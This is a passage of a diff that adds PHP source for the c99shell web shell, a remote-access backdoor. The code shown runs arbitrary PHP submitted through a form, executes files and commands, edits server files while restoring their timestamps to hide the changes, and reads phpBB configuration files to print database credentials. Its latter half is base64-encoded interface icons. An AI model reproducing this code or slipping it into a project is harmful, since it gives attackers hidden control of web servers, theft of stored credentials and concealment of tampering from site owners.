+  $head[$k] = "<b>".$head[$k]."</b>".$y; 
+  $v = $processes_sort[0]; 
+  usort($prcs,"tabsort"); 
+  if ($processes_sort[1] == "d") {$prcs = array_reverse($prcs);} 
+  $tab = array(); 
+  $tab[] = $head; 
+  $tab = array_merge($tab,$prcs); 
+  echo "<TABLE height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgcolor=#000000 borderColorLight=#c0c0c0 border=1 bordercolor=\"#C0C0C0\">"; 
+  foreach($tab as $i=>$k) 
+  { 
+   echo "<tr>"; 
+   foreach($k as $j=>$v) {if ($win and $i > 0 and $j == 2) {$v = view_size($v);} echo "<td>".$v."</td>";} 
+   echo "</tr>"; 
+  } 
+  echo "</table>"; 
+ } 
+} 
+if ($act == "eval") 
+{ 
+ if (!empty($eval)) 
+ { 
+  echo "<b>Result of execution this PHP-code</b>:<br>"; 
+  $tmp = ob_get_contents(); 
+  $olddir = realpath("."); 
+  @chdir($d); 
+  if ($tmp) 
+  { 
+   ob_clean(); 
+   eval($eval); 
+   $ret = ob_get_contents(); 
+   $ret = convert_cyr_string($ret,"d","w"); 
+   ob_clean(); 
+   echo $tmp; 
+   if ($eval_txt) 
+   { 
+    $rows = count(explode("\r\n",$ret))+1; 
+    if ($rows < 10) {$rows = 10;} 
+    echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>"; 
+   } 
+   else {echo $ret."<br>";} 
+  } 
+  else 
+  { 
+   if ($eval_txt) 
+   { 
+    echo "<br><textarea cols=\"122\" rows=\"15\" readonly>"; 
+    eval($eval); 
+    echo "</textarea>"; 
+   } 
+   else {echo $ret;} 
+  } 
+  @chdir($olddir); 
+ } 
+ else {echo "<b>Execution PHP-code</b>"; if (empty($eval_txt)) {$eval_txt = TRUE;}} 
+ echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=eval><textarea name=\"eval\" cols=\"122\" rows=\"10\">".htmlspecialchars($eval)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"eval_txt\" value=\"1\""; if ($eval_txt) {echo " checked";} echo "></form>"; 
+} 
+if ($act == "f") 
+{ 
+ if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit") 
+ { 
+  if (file_exists($d.$f)) {echo "<center><b>Permision denied (".htmlspecialchars($d.$f).")!</b></center>";} 
+  else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!</b><br><a href=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."&c=1\"><u>Create</u></a></center>";} 
+ } 
+ else 
+ { 
+  $r = @file_get_contents($d.$f); 
+  $ext = explode(".",$f); 
+  $c = count($ext)-1; 
+  $ext = $ext[$c]; 
+  $ext = strtolower($ext); 
+  $rft = ""; 
+  foreach($ftypes as $k=>$v) {if (in_array($ext,$v)) {$rft = $k; break;}} 
+  if (eregi("sess_(.*)",$f)) {$rft = "phpsess";} 
+  if (empty($ft)) {$ft = $rft;} 
+  $arr = array( 
+   array("<img src=\"".$surl."act=img&img=ext_diz\" border=\"0\">","info"), 
+   array("<img src=\"".$surl."act=img&img=ext_html\" border=\"0\">","html"), 
+   array("<img src=\"".$surl."act=img&img=ext_txt\" border=\"0\">","txt"), 
+   array("Code","code"), 
+   array("Session","phpsess"), 
+   array("<img src=\"".$surl."act=img&img=ext_exe\" border=\"0\">","exe"), 
+   array("SDB","sdb"), 
+   array("<img src=\"".$surl."act=img&img=ext_gif\" border=\"0\">","img"), 
+   array("<img src=\"".$surl."act=img&img=ext_ini\" border=\"0\">","ini"), 
+   array("<img src=\"".$surl."act=img&img=download\" border=\"0\">","download"), 
+   array("<img src=\"".$surl."act=img&img=ext_rtf\" border=\"0\">","notepad"), 
+   array("<img src=\"".$surl."act=img&img=change\" border=\"0\">","edit") 
+  ); 
+  echo "<b>Viewing file:&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;".$f." (".view_size(filesize($d.$f)).") &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".view_perms_color($d.$f)."</b><br>Select action/file-type:<br>"; 
+  foreach($arr as $t) 
+  { 
+   if ($t[1] == $rft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><font color=green>".$t[0]."</font></a>";} 
+   elseif ($t[1] == $ft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b><u>".$t[0]."</u></b></a>";} 
+   else {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b>".$t[0]."</b></a>";} 
+   echo " (<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&white=1&d=".urlencode($d)."\" target=\"_blank\">+</a>) |"; 
+  } 
+  echo "<hr size=\"1\" noshade>"; 
+  if ($ft == "info") 
+  { 
+   echo "<b>Information:</b><table border=0 cellspacing=1 cellpadding=2><tr><td><b>Path</b></td><td> ".$d.$f."</td></tr><tr><td><b>Size</b></td><td> ".view_size(filesize($d.$f))."</td></tr><tr><td><b>MD5</b></td><td> ".md5_file($d.$f)."</td></tr>"; 
+   if (!$win) 
+   { 
+    echo "<tr><td><b>Owner/Group</b></td><td> ";     
+    $ow = posix_getpwuid(fileowner($d.$f)); 
+    $gr = posix_getgrgid(filegroup($d.$f)); 
+    echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f)); 
+   } 
+   echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&f=".urlencode($f)."&d=".urlencode($d)."\">".view_perms_color($d.$f)."</a></td></tr><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr></table><br>"; 
+   $fi = fopen($d.$f,"rb"); 
+   if ($fi) 
+   { 
+    if ($fullhexdump) {echo "<b>FULL HEXDUMP</b>"; $str = fread($fi,filesize($d.$f));} 
+    else {echo "<b>HEXDUMP PREVIEW</b>"; $str = fread($fi,$hexdump_lines*$hexdump_rows);} 
+    $n = 0; 
+    $a0 = "00000000<br>"; 
+    $a1 = ""; 
+    $a2 = ""; 
+    for ($i=0; $i<strlen($str); $i++) 
+    { 
+     $a1 .= sprintf("%02X",ord($str[$i]))." "; 
+     switch (ord($str[$i])) 
+     { 
+      case 0:  $a2 .= "<font>0</font>"; break; 
+      case 32: 
+      case 10: 
+      case 13: $a2 .= "&nbsp;"; break; 
+      default: $a2 .= htmlspecialchars($str[$i]); 
+     } 
+     $n++; 
+     if ($n == $hexdump_rows) 
+     { 
+      $n = 0; 
+      if ($i+1 < strlen($str)) {$a0 .= sprintf("%08X",$i+1)."<br>";} 
+      $a1 .= "<br>"; 
+      $a2 .= "<br>"; 
+     } 
+    } 
+    //if ($a1 != "") {$a0 .= sprintf("%08X",$i)."<br>";} 
+    echo "<table border=0 bgcolor=#666666 cellspacing=1 cellpadding=4><tr><td bgcolor=#666666>".$a0."</td><td bgcolor=000000>".$a1."</td><td bgcolor=000000>".$a2."</td></tr></table><br>"; 
+   } 
+   $encoded = ""; 
+   if ($base64 == 1) 
+   { 
+    echo "<b>Base64 Encode</b><br>"; 
+    $encoded = base64_encode(file_get_contents($d.$f)); 
+   } 
+   elseif($base64 == 2) 
+   { 
+    echo "<b>Base64 Encode + Chunk</b><br>"; 
+    $encoded = chunk_split(base64_encode(file_get_contents($d.$f))); 
+   } 
+   elseif($base64 == 3) 
+   { 
+    echo "<b>Base64 Encode + Chunk + Quotes</b><br>"; 
+    $encoded = base64_encode(file_get_contents($d.$f)); 
+    $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2); 
+   } 
+   elseif($base64 == 4) 
+   { 
+    $text = file_get_contents($d.$f); 
+    $encoded = base64_decode($text); 
+    echo "<b>Base64 Decode"; 
+    if (base64_encode($encoded) != $text) {echo " (failed)";} 
+    echo "</b><br>"; 
+   } 
+   if (!empty($encoded)) 
+   { 
+    echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea><br><br>"; 
+   } 
+   echo "<b>HEXDUMP:</b><nobr> [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&fullhexdump=1&d=".urlencode($d)."\">Full</a>] [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&d=".urlencode($d)."\">Preview</a>]<br><b>Base64: </b> 
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=1&d=".urlencode($d)."\">Encode</a>]&nbsp;</nobr> 
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=2&d=".urlencode($d)."\">+chunk</a>]&nbsp;</nobr> 
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=3&d=".urlencode($d)."\">+chunk+quotes</a>]&nbsp;</nobr> 
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=4&d=".urlencode($d)."\">Decode</a>]&nbsp;</nobr> 
+<P>"; 
+  } 
+  elseif ($ft == "html") 
+  { 
+   if ($white) {@ob_clean();} 
+   echo $r; 
+   if ($white) {c99shexit();} 
+  } 
+  elseif ($ft == "txt") {echo "<pre>".htmlspecialchars($r)."</pre>";} 
+  elseif ($ft == "ini") {echo "<pre>"; var_dump(parse_ini_file($d.$f,TRUE)); echo "</pre>";} 
+  elseif ($ft == "phpsess") 
+  { 
+   echo "<pre>"; 
+   $v = explode("|",$r); 
+   echo $v[0]."<br>"; 
+   var_dump(unserialize($v[1])); 
+   echo "</pre>"; 
+  } 
+  elseif ($ft == "exe") 
+  { 
+   $ext = explode(".",$f); 
+   $c = count($ext)-1; 
+   $ext = $ext[$c]; 
+   $ext = strtolower($ext); 
+   $rft = ""; 
+   foreach($exeftypes as $k=>$v) 
+   { 
+    if (in_array($ext,$v)) {$rft = $k; break;} 
+   } 
+   $cmd = str_replace("%f%",$f,$rft); 
+   echo "<b>Execute file:</b><form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><input type=\"text\" name=\"cmd\" value=\"".htmlspecialchars($cmd)."\" size=\"".(strlen($cmd)+2)."\"><br>Display in text-area<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\" checked><input type=hidden name=\"d\" value=\"".htmlspecialchars($d)."\"><br><input type=submit name=submit value=\"Execute\"></form>"; 
+  } 
+  elseif ($ft == "sdb") {echo "<pre>"; var_dump(unserialize(base64_decode($r))); echo "</pre>";} 
+  elseif ($ft == "code") 
+  { 
+   if (ereg("php"."BB 2.(.*) auto-generated config file",$r)) 
+   { 
+    $arr = explode("\n",$r); 
+    if (count($arr == 18)) 
+    { 
+     include($d.$f); 
+     echo "<b>phpBB configuration is detected in this file!<br>"; 
+     if ($dbms == "mysql4") {$dbms = "mysql";} 
+     if ($dbms == "mysql") {echo "<a href=\"".$surl."act=sql&sql_server=".htmlspecialchars($dbhost)."&sql_login=".htmlspecialchars($dbuser)."&sql_passwd=".htmlspecialchars($dbpasswd)."&sql_port=3306&sql_db=".htmlspecialchars($dbname)."\"><b><u>Connect to DB</u></b></a><br><br>";} 
+     else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by c99shell. Please, report us for fix.";} 
+     echo "Parameters for manual connect:<br>"; 
+     $cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd); 
+     foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'<br>";} 
+     echo "</b><hr size=\"1\" noshade>"; 
+    } 
+   } 
+   echo "<div style=\"border : 0px solid #FFFFFF; padding: 1em; margin-top: 1em; margin-bottom: 1em; margin-right: 1em; margin-left: 1em; background-color: ".$highlight_background .";\">"; 
+   if (!empty($white)) {@ob_clean();} 
+   highlight_file($d.$f); 
+   if (!empty($white)) {c99shexit();} 
+   echo "</div>"; 
+  } 
+  elseif ($ft == "download") 
+  { 
+   @ob_clean(); 
+   header("Content-type: application/octet-stream"); 
+   header("Content-length: ".filesize($d.$f)); 
+   header("Content-disposition: attachment; filename=\"".$f."\";"); 
+   echo $r; 
+   exit; 
+  } 
+  elseif ($ft == "notepad") 
+  { 
+   @ob_clean(); 
+   header("Content-type: text/plain"); 
+   header("Content-disposition: attachment; filename=\"".$f.".txt\";"); 
+   echo($r); 
+   exit; 
+  } 
+  elseif ($ft == "img") 
+  { 
+   $inf = getimagesize($d.$f); 
+   if (!$white) 
+   { 
+    if (empty($imgsize)) {$imgsize = 20;} 
+    $width = $inf[0]/100*$imgsize; 
+    $height = $inf[1]/100*$imgsize; 
+    echo "<center><b>Size:</b>&nbsp;"; 
+    $sizes = array("100","50","20"); 
+    foreach ($sizes as $v) 
+    { 
+     echo "<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=img&d=".urlencode($d)."&imgsize=".$v."\">"; 
+     if ($imgsize != $v ) {echo $v;} 
+     else {echo "<u>".$v."</u>";} 
+     echo "</a>&nbsp;&nbsp;&nbsp;"; 
+    } 
+    echo "<br><br><img src=\"".$surl."act=f&f=".urlencode($f)."&ft=img&white=1&d=".urlencode($d)."\" width=\"".$width."\" height=\"".$height."\" border=\"1\"></center>"; 
+   } 
+   else 
+   { 
+    @ob_clean(); 
+    $ext = explode($f,"."); 
+    $ext = $ext[count($ext)-1]; 
+    header("Content-type: ".$inf["mime"]); 
+    readfile($d.$f); 
+    exit; 
+   } 
+  } 
+  elseif ($ft == "edit") 
+  { 
+   if (!empty($submit)) 
+   { 
+    if ($filestealth) {$stat = stat($d.$f);} 
+    $fp = fopen($d.$f,"w"); 
+    if (!$fp) {echo "<b>Can't write to file!</b>";} 
+    else 
+    { 
+     echo "<b>Saved!</b>"; 
+     fwrite($fp,$edit_text); 
+     fclose($fp); 
+     if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);} 
+     $r = $edit_text; 
+    } 
+   } 
+   $rows = count(explode("\r\n",$r)); 
+   if ($rows < 10) {$rows = 10;} 
+   if ($rows > 30) {$rows = 30;} 
+   echo "<form action=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."\" method=POST><input type=submit name=submit value=\"Save\">&nbsp;<input type=\"reset\" value=\"Reset\">&nbsp;<input type=\"button\" onclick=\"location.href='".addslashes($surl."act=ls&d=".substr($d,0,-1))."';\" value=\"Back\"><br><textarea name=\"edit_text\" cols=\"122\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea></form>"; 
+  } 
+  elseif (!empty($ft)) {echo "<center><b>Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.</b></center>";} 
+  else {echo "<center><b>Unknown extension (".$ext."), please, select type manually.</b></center>";} 
+ } 
+} 
+} 
+else 
+{ 
+ @ob_clean(); 
+ $images = array( 
+"arrow_ltr"=> 
+"R0lGODlhJgAWAIAAAAAAAP///yH5BAUUAAEALAAAAAAmABYAAAIvjI+py+0PF4i0gVvzuVxXDnoQ". 
+"SIrUZGZoerKf28KjPNPOaku5RfZ+uQsKh8RiogAAOw==", 
+"back"=> 
+"R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8". 
+"aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt". 
+"Wg0JADs=", 
+"buffer"=> 
+"R0lGODlhFAAUAKIAAAAAAP////j4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQAAANo". 
+"eLrcribG90y4F1Amu5+NhY2kxl2CMKwrQRSGuVjp4LmwDAWqiAGFXChg+xhnRB+ptLOhai1crEmD". 
+"Dlwv4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==", 
+"change"=> 
+"R0lGODlhFAAUAMQfAL3hj7nX+pqo1ejy/f7YAcTb+8vh+6FtH56WZtvr/RAQEZecx9Ll/PX6/v3+". 
+"/3eHt6q88eHu/ZkfH3yVyIuQt+72/kOm99fo/P8AZm57rkGS4Hez6pil9oep3GZmZv///yH5BAEA". 
+"AB8ALAAAAAAUABQAAAWf4CeOZGme6NmtLOulX+c4TVNVQ7e9qFzfg4HFonkdJA5S54cbRAoFyEOC". 
+"wSiUtmYkkrgwOAeA5zrqaLldBiNMIJeD266XYTgQDm5Rx8mdG+oAbSYdaH4Ga3c8JBMJaXQGBQgA". 
+"CHkjE4aQkQ0AlSITan+ZAQqkiiQPj1AFAaMKEKYjD39QrKwKAa8nGQK8Agu/CxTCsCMexsfIxjDL". 
+"zMshADs=", 
+"delete"=> 
+"R0lGODlhFAAUAOZZAPz8/NPFyNgHLs0YOvPz8/b29sacpNXV1fX19cwXOfDw8Kenp/n5+etgeunp". 
+"6dcGLMMpRurq6pKSktvb2+/v7+1wh3R0dPnP17iAipxyel9fX7djcscSM93d3ZGRkeEsTevd4LCw". 
+"sGRkZGpOU+IfQ+EQNoh6fdIcPeHh4YWFhbJQYvLy8ui+xm5ubsxccOx8kcM4UtY9WeAdQYmJifWv". 
+"vHx8fMnJycM3Uf3v8rRue98ONbOzs9YFK5SUlKYoP+Tk5N0oSufn57ZGWsQrR9kIL5CQkOPj42Vl". 
+"ZeAPNudAX9sKMPv7+15QU5ubm39/f8e5u4xiatra2ubKz8PDw+pfee9/lMK0t81rfd8AKf///wAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5". 
+"BAEAAFkALAAAAAAUABQAAAesgFmCg4SFhoeIhiUfIImIMlgQB46GLAlYQkaFVVhSAIZLT5cbEYI4". 
+"STo5MxOfhQwBA1gYChckQBk1OwiIALACLkgxJilTBI69RFhDFh4HDJRZVFgPPFBR0FkNWDdMHA8G". 
+"BZTaMCISVgMC4IkVWCcaPSi96OqGNFhKI04dgr0QWFcKDL3A4uOIjVZZABxQIWDBLkIEQrRoQsHQ". 
+"jwVFHBgiEGQFIgQasYkcSbJQIAA7", 
+"download"=> 
+"R0lGODlhFAAUALMIAAD/AACAAIAAAMDAwH9/f/8AAP///wAAAP///wAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAACH5BAEAAAgALAAAAAAUABQAAAROEMlJq704UyGOvkLhfVU4kpOJSpx5nF9YiCtLf0SuH7pu". 
+"EYOgcBgkwAiGpHKZzB2JxADASQFCidQJsMfdGqsDJnOQlXTP38przWbX3qgIADs=", 
+"forward"=> 
+"R0lGODlhFAAUAPIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8". 
+"aLrc/jDK2Qp9xV5WiN5G50FZaRLD6IhE66Lpt3RDbd9CQFSE4P++QW7He7UKPh0IqVw2l0RQSEqt". 
+"WqsJADs=", 
+"home"=> 
+"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzLKysoaGhmZmZgQEBP///wAAAAAAAAAAAAAAAAAA". 
+"AAAAACH5BAEAAAkALAAAAAAUABQAAAR+MMk5TTWI6ipyMoO3cUWRgeJoCCaLoKO0mq0ZxjNSBDWS". 
+"krqAsLfJ7YQBl4tiRCYFSpPMdRRCoQOiL4i8CgZgk09WfWLBYZHB6UWjCequwEDHuOEVK3QtgN/j". 
+"VwMrBDZvgF+ChHaGeYiCBQYHCH8VBJaWdAeSl5YiW5+goBIRADs=", 
+"mode"=> 
+"R0lGODlhHQAUALMAAAAAAP///6CgpN3d3czMzIaGhmZmZl9fX////wAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAACH5BAEAAAgALAAAAAAdABQAAASBEMlJq70461m6/+AHZMUgnGiqniNWHHAsz3F7FUGu73xO". 
+"2BZcwGDoEXk/Uq4ICACeQ6fzmXTlns0ddle99b7cFvYpER55Z10Xy1lKt8wpoIsACrdaqBpYEYK/". 
+"dH1LRWiEe0pRTXBvVHwUd3o6eD6OHASXmJmamJUSY5+gnxujpBIRADs=", 
+"refresh"=> 
+"R0lGODlhEQAUALMAAAAAAP////Hx8erq6uPj493d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAA". 
+"AAAAACH5BAEAAAwALAAAAAARABQAAAR1kMlJq0Q460xR+GAoIMvkheIYlMyJBkJ8lm6YxMKi6zWY". 
+"3AKCYbjo/Y4EQqFgKIYUh8EvuWQ6PwPFQJpULpunrXZLrYKx20G3oDA7093Esv19q5O/woFu9ZAJ". 
+"R3lufmWCVX13h3KHfWWMjGBDkpOUTTuXmJgRADs=", 
+"search"=> 
+"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzMDAwLKysoaGhnd3d2ZmZl9fX01NTSkpKQQEBP//". 
+"/wAAACH5BAEAAA4ALAAAAAAUABQAAASn0Ml5qj0z5xr6+JZGeUZpHIqRNOIRfIYiy+a6vcOpHOap". 
+"s5IKQccz8XgK4EGgQqWMvkrSscylhoaFVmuZLgUDAnZxEBMODSnrkhiSCZ4CGrUWMA+LLDxuSHsD". 
+"AkN4C3sfBX10VHaBJ4QfA4eIU4pijQcFmCVoNkFlggcMRScNSUCdJyhoDasNZ5MTDVsXBwlviRmr". 
+"Cbq7C6sIrqawrKwTv68iyA6rDhEAOw==", 
+"setup"=> 
+"R0lGODlhFAAUAMQAAAAAAP////j4+OPj493d3czMzMDAwLKyspaWloaGhnd3d2ZmZl9fX01NTUJC". 
+"QhwcHP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA". 
+"ABAALAAAAAAUABQAAAWVICSKikKWaDmuShCUbjzMwEoGhVvsfHEENRYOgegljkeg0PF4KBIFRMIB". 
+"qCaCJ4eIGQVoIVWsTfQoXMfoUfmMZrgZ2GNDPGII7gJDLYErwG1vgW8CCQtzgHiJAnaFhyt2dwQE". 
+"OwcMZoZ0kJKUlZeOdQKbPgedjZmhnAcJlqaIqUesmIikpEixnyJhulUMhg24aSO6YyEAOw==", 
+"small_dir"=> 
+"R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp". 
+"/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=", 
+"small_unk"=> 
+"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAIep3BE9mllic3B5iVpjdMvh/MLc+y1U". 
+"p9Pm/GVufc7j/MzV/9Xm/EOm99bn/Njp/a7Q+tTm/LHS+eXw/t3r/Nnp/djo/Nrq/fj7/9vq/Nfo". 
+"/Mbe+8rh/Mng+7jW+rvY+r7Z+7XR9dDk/NHk/NLl/LTU+rnX+8zi/LbV++fx/e72/vH3/vL4/u31". 
+"/e31/uDu/dzr/Orz/eHu/fX6/vH4/v////v+/3ez6vf7//T5/kGS4Pv9/7XV+rHT+r/b+rza+vP4". 
+"/uz0/urz/u71/uvz/dTn/M/k/N3s/dvr/cjg+8Pd+8Hc+sff+8Te+/D2/rXI8rHF8brM87fJ8nmP". 
+"wr3N86/D8KvB8F9neEFotEBntENptENptSxUpx1IoDlfrTRcrZeeyZacxpmhzIuRtpWZxIuOuKqz". 
+"9ZOWwX6Is3WIu5im07rJ9J2t2Zek0m57rpqo1nKCtUVrtYir3vf6/46v4Yuu4WZvfr7P6sPS6sDQ". 
+"66XB6cjZ8a/K79/s/dbn/ezz/czd9mN0jKTB6ai/76W97niXz2GCwV6AwUdstXyVyGSDwnmYz4io". 
+"24Oi1a3B45Sy4ae944Ccz4Sj1n2GlgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAjnACtVCkCw4JxJAQQqFBjAxo0MNGqsABQAh6CFA3nk0MHiRREVDhzsoLQwAJ0gT4ToecSHAYMz". 
+"aQgoDNCCSB4EAnImCiSBjUyGLobgXBTpkAA5I6pgmSkDz5cuMSz8yWlAyoCZFGb4SQKhASMBXJpM". 
+"uSrQEQwkGjYkQCTAy6AlUMhWklQBw4MEhgSA6XPgRxS5ii40KLFgi4BGTEKAsCKXihESCzrsgSQC". 
+"yIkUV+SqOYLCA4csAup86OGDkNw4BpQ4OaBFgB0TEyIUKqDwTRs4a9yMCSOmDBoyZu4sJKCgwIDj". 
+"yAsokBkQADs=", 
+"multipage"=>"R0lGODlhCgAMAJEDAP/////3mQAAAAAAACH5BAEAAAMALAAAAAAKAAwAAAIj3IR". 
+"pJhCODnovidAovBdMzzkixlXdlI2oZpJWEsSywLzRUAAAOw==", 
+"sort_asc"=> 
+"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMa". 
+"SLrcPcE9GKUaQlQ5sN5PloFLJ35OoK6q5SYAOw==", 
+"sort_desc"=> 
+"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMb". 
+"SLrcOjBCB4UVITgyLt5ch2mgSJZDBi7p6hIJADs=", 
+"sql_button_drop"=> 
+"R0lGODlhCQALAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". 
+"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". 
+"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". 
+"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". 
+"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". 
+"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". 
+"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". 
+"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". 
+"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". 
+"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". 
+"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". 
+"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". 
+"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAsA". 
+"AAg4AP8JREFQ4D+CCBOi4MawITeFCg/iQhEPxcSBlFCoQ5Fx4MSKv1BgRGGMo0iJFC2ehHjSoMt/". 
+"AQEAOw==", 
+"sql_button_empty"=> 
+"R0lGODlhCQAKAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". 
+"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". 
+"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". 
